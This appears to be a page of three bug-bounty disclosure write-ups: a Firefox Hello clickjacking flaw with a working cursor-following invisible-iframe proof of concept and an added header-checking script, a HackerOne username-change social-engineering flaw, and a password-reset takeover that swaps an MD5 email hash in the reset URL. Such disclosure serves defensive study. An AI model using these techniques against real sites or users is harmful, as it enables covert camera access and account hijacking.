Clickjacking in Firefox Hello


Clickjacking is the art of tricking users into clicking on links or buttons they would never knowingly click. But how much damage can you do by stealing a few clicks? It is 2015, and one might think that this kind of vulnerability would have been eliminated by now. That is not the case.

Firefox Hello

Recently Mozilla launched Firefox Hello, their free service for video and voice conversations online. After a few tests, I noticed that the hello.firefox.com website does not prevent framing.
I also noticed that to invite a friend to a conversation, one sends him a link like
https://hello.firefox.com/conversationToken . The friend then has to:
1. open the link;
2. click the “Join the conversation” button;
3. allow hello.firefox.com to use the camera and microphone.
Chances are that someone who uses hello.firefox.com a lot will have allowed the website to use his microphone and camera permanently, so that he does not have to go through step 3 every time. The problem is that https://hello.firefox.com/conversationToken can be loaded into an iframe, so the click in step 2 can be obtained by clickjacking, and step 3 is already satisfied by the standing permission. In these conditions, an attacker can gain access to a victim's camera and microphone using nothing but the trust the victim has placed in hello.firefox.com (the permission for this website to use the camera and microphone anytime).

Step-by-step attack scenario

1. Brandon is the attacker, an evil person. Andreea is the target, a person who uses hello.firefox.com to chat with her friends and is trusting enough to allow the website to access her camera and microphone anytime;
2. Brandon creates a conversation on hello.firefox.com and obtains a link to invite his “friends” to chat: https://hello.firefox.com/HxfymOMuLX4 ;
3. Brandon integrates the link into a clickjacking attack. He is not a very skilled programmer, but he manages to obtain a working example, which he uploads to his website;
4. Using Facebook or whatever, Brandon sends the link to Andreea because “he wants to show her a cute kitten”;
5. Andreea visits Brandon's page because she loves kittens. While wishing very much that she could pet that wonder, she makes one simple click anywhere on the page (a left-click, nothing special);
6. Because the “Join the conversation” button from https://hello.firefox.com/HxfymOMuLX4 was positioned under the mouse, and Andreea has allowed hello.firefox.com to use her camera and microphone anytime, Brandon now has access to his target's microphone and camera. Good job, Brandon!
7. Andreea might notice that her camera and microphone are in use, but it is already too late: probably a picture of her has leaked to who-knows-whom. And she was wearing her favorite Pokémon t-shirt. Oh God. If she hasn't noticed that she is being recorded… I don't want to think about it!

<html>
<head>
<title>Security Cat</title>
<script>
// Keep the invisible iframe centred under the cursor, so that wherever the
// victim clicks, the click lands on the "Join the conversation" button.
// (Values need a px unit; without it the assignment is ignored in standards mode.)
document.addEventListener('mousemove', function (e) {
  var frame = document.getElementById('click');
  frame.style.left = (e.clientX || e.pageX) + 'px';
  frame.style.top = (e.clientY || e.pageY) + 'px';
}, false);
</script>
</head>
<body style="margin:0px;padding:0px;overflow:hidden">
<!-- Decoy content: the only thing the victim sees -->
<img src="http://www.nose2tail.co.uk/cat-matlock-derbyshire.jpg" />
<!-- Fully transparent frame of the conversation page, sized to the button and
     offset by half its width and height so that its centre follows the cursor -->
<iframe id="click" frameborder="0" scrolling="no"
  style="overflow:hidden;height:30px;width:120px;opacity:0;position:absolute;top:0px;left:0px;margin-top:-15px;margin-left:-75px"
  src="https://hello.firefox.com/HxfymOMuLX4">
</iframe>
</body>
</html>
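The post does not say which header Mozilla's fix used. What a tester checks before and after such a fix, added here as an example that is not part of the original post: a function that reads the two response headers governing framing and decides whether a page at one origin may be embedded by a page at another. Browsers give a CSP frame-ancestors directive precedence over X-Frame-Options when both are present. The header values, the attacker origin and the test origins in the sample are constructed for illustration; they are not what hello.firefox.com sent.

```javascript
// Added example: decide whether a response served from pageOrigin can be put in an
// <iframe> by a page at framerOrigin, from its X-Frame-Options and CSP headers.
// Sample header values below are constructed, not captured from hello.firefox.com.

function parseFrameAncestors(csp) {
  // Return the source list of the frame-ancestors directive, or null if absent.
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0 && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.replace(/^'(.*)'$/, '$1').toLowerCase());
    }
  }
  return null;
}

function sourceMatches(source, framerOrigin, pageOrigin) {
  // Match one frame-ancestors source expression against the framing page's origin.
  if (source === 'none') return false;
  if (source === '*') return true;
  if (source === 'self') return framerOrigin === pageOrigin;
  const framer = new URL(framerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) {
    return framer.protocol === source;                 // bare scheme such as https:
  }
  const schemeMatch = source.match(/^([a-z][a-z0-9+.-]*):\/\/(.*)$/);
  const hostPart = schemeMatch ? schemeMatch[2] : source;
  if (schemeMatch && framer.protocol !== schemeMatch[1] + ':') return false;
  if (hostPart.startsWith('*.')) {
    return framer.host.endsWith(hostPart.slice(1));    // *.example.org matches a.example.org
  }
  return framer.host === hostPart;
}

function framingAllowed(headers, framerOrigin, pageOrigin) {
  // headers: plain object keyed by lower-case header name.
  const ancestors = parseFrameAncestors(headers['content-security-policy']);
  if (ancestors !== null) {
    // frame-ancestors present: it wins, and an empty source list means nobody.
    return ancestors.some((s) => sourceMatches(s, framerOrigin, pageOrigin));
  }
  const xfoRaw = (headers['x-frame-options'] || '').trim();
  const xfo = xfoRaw.toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === pageOrigin;
  if (xfo.startsWith('ALLOW-FROM')) {
    // Obsolete directive that Firefox honoured at the time of the post; browsers
    // that never implemented it ignore the header and allow framing.
    const allowed = new URL(xfoRaw.slice('ALLOW-FROM'.length).trim()).origin;
    return allowed === framerOrigin;
  }
  // No framing header at all: any site can frame the page. This is the state the
  // post describes for hello.firefox.com before the fix.
  return true;
}

// Constructed sample: the unprotected response beside two ways of fixing it.
const PAGE = 'https://hello.firefox.com';
const ATTACKER = 'https://attacker.example';
const SAMPLE_HEADERS = {
  unprotected: {},
  fixedWithCsp: { 'content-security-policy': "default-src 'self'; frame-ancestors 'self'" },
  fixedWithXfo: { 'x-frame-options': 'DENY' },
};

function checkSamples() {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLE_HEADERS)) {
    out[name] = framingAllowed(headers, ATTACKER, PAGE);
  }
  return out; // { unprotected: true, fixedWithCsp: false, fixedWithXfo: false }
}

console.log(checkSamples());
```

Run it with node. The unprotected entry comes back framable, which is the situation the post describes; either fix closes it. ALLOW-FROM is handled only because Firefox supported it in 2015; it is obsolete, and frame-ancestors is the portable choice today.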

Bug report

I reported this vulnerability to Mozilla and they were great about it. In about 24 hours they acknowledged the problem, came up with a fix, tested it and pushed it into production. From my experience with bug reports, I can say that solving a newly reported bug in this time frame is an absolute record. Way to go, guys!
Oh, and they were kind enough to reward the bug with a rather large bounty. Thank you!





HACKERONE USERNAME CHANGE EXPLOIT | SOCIAL ENGINEERING |



In this write-up I explain the method I used to perform an unauthorized username change on any HackerOne account. The flaw was in an internal process: the support flow performed no email verification at all, which is what allowed the attack to succeed.





As we all know, HackerOne is one of the best and most controversial managed bug bounty platforms on the internet, and every day researchers from all around the world test their custom exploits against the applications sponsored there by vendors and companies.

Does Social Engineering count?

Web application vendors and companies often do not educate their employees and staff about social engineering attacks, and most of the time no policies are defined for handling such situations. A simple flaw of this kind in HackerOne's internal flow let me discover a way to change the username of any account on HackerOne.

How did HackerOne handle username changes?

Anyone who has used HackerOne for a few months will know that HackerOne handled username changes through email requests. If a user wanted to change his username, he had to email support@hackerone.com to open a username-change request, which would be reviewed, after which he would be granted the new username.

How HackerOne's email verification failed, and the exploit

The root cause of this whole attack was HackerOne's email handling process. The exploit scenario was very simple: the support flow did not verify two things.
  •  which address the username-change request was coming from;
  •  whether that address was associated with the account being changed.
    So building an attack scenario out of this was relatively easy:
  • The victim has an account registered to victim@gmail.com with the username victim.
  • The attacker mails support from attacker@gmail.com asking to change the username of that account (usernames are visible to everyone on HackerOne).
  • The attacker confirms the change from his own email; the original user is never prompted.
    And the username is changed.
    I created two email accounts and attached one of them to a HackerOne account with the username yhunterz.
    I carried out the exploit from the other test email, which was not associated with the account holding that username, because I had a gut feeling that the system does not verify the email of the username-change request.

Social Engineering Email

As expected, I was not asked for any confirmation, nor was my email address checked to be valid for the username change. Just a verbal confirmation.


And within 24 hours the username was changed.
I reported the issue to HackerOne right after completing the procedure and carrying out the exploit. They were very quick to define policies in their email management system to check for the associated email address, as a patch for the issue.


For the issue they rewarded me with a considerable bounty and a place in their eternal hall of fame. I am thankful to HackerOne for this honor, and I continuously look for issues to report to them that help improve their security controls.
Do post your comments about this write-up, and suggest topics for our next write-ups on our Advisories page.
Until the next write-up: stay safe and hack on!

Account Takeover Using Password Reset Vulnerability

Account Takeover Using Password Reset Functionality
---------------------------------------

While researching and working on bug bounties I found that, on a site vulnerable to this type of attack, the password reset functionality (the reset token and link) can be used to take over every user account on the site.

The password reset link sent to the user includes the MD5 hash of the user's email address, and the password reset token is not tied to a single user, so it can be reused for other users. An attacker can therefore replace the email hash in his own reset link with the MD5 hash of any victim's email address and set that victim's password. Repeating this, he can reset the passwords of all accounts and compromise them.


Steps to Execute the Attack:

The precondition is that the attacker knows the victim's email address, from which its MD5 hash value is computed.

Attacker's email ID: attackeremailid@gmail.com, and his password reset link:


http://testsite.com/reset-password/74o4s384549484c4k4v506t4d5a3e5n5k444j4g5j4o4c553l454h464m474/74q55426l4q5u5m5c4s5l5m5n5t2102fadb4bd021805624f06ea4c8e4d38


The first part of the password reset URL, before the '/', is the password reset token; the second part identifies the user. Its first 28 characters (74q55426l4q5u5m5c4s5l5m5n5t2) are the same for every user, and the remaining 32 characters differ per user because they are the MD5 hash of the user's email ID. MD5 is a hash, not encryption, so nothing has to be "decrypted": knowing the victim's email address, the attacker simply computes its MD5 hash. If he only has a hash and wants the address behind it, lookup services such as http://md5decryption.com can often recover common inputs. Some websites instead use base64 (or other reversible encodings), which can be decoded directly with tools such as http://ostermiller.org/calc/encode.html.


Attacker's email ID: attackeremailid@gmail.com, MD5 hash value:
102fadb4bd021805624f06ea4c8e4d38


Victim's email ID: victimemailid@gmail.com, MD5 hash value:
05ebb8fb6ec39f50d33e19cd5719084d


First 28 characters, the same in every user's identifier:
74q55426l4q5u5m5c4s5l5m5n5t2


Crafted URL to reset the password of the victim's account, victimemailid@gmail.com:

http://testsite.com/reset-password/74o4s384549484c4k4v506t4d5a3e5n5k444j4g5j4o4c553l454h464m474/74q55426l4q5u5m5c4s5l5m5n5t205ebb8fb6ec39f50d33e19cd5719084d

In this way the attacker can take over any user's account.
                                       

Impact: 

The token generated for the reset link isn't checked against the account it was issued for, and no validation is done on the associated email ID field, allowing an attacker to change that value to the MD5 hash of a known email address and reset that account's password. This provides a trivial route for an attacker to gain access to accounts or to cause a denial of service for users of the application by resetting their passwords.


Recommendation: 

Input from the user should be treated as untrusted and re-validated on the server. The recommended approach is to generate a one-time random token linked to the user account and to pass only that token in the link, instead of the email ID hash; the token should be invalidated as soon as the password has been reset, and should also expire after a short time. Additionally, ensure that a request in which the identifier is missing does not default to updating all accounts.

In this way one can take over victims' accounts using the password reset functionality, token and link, and the same approach can be used to find this type of vulnerability on other websites.


Suggestions and Feedbacks are welcome.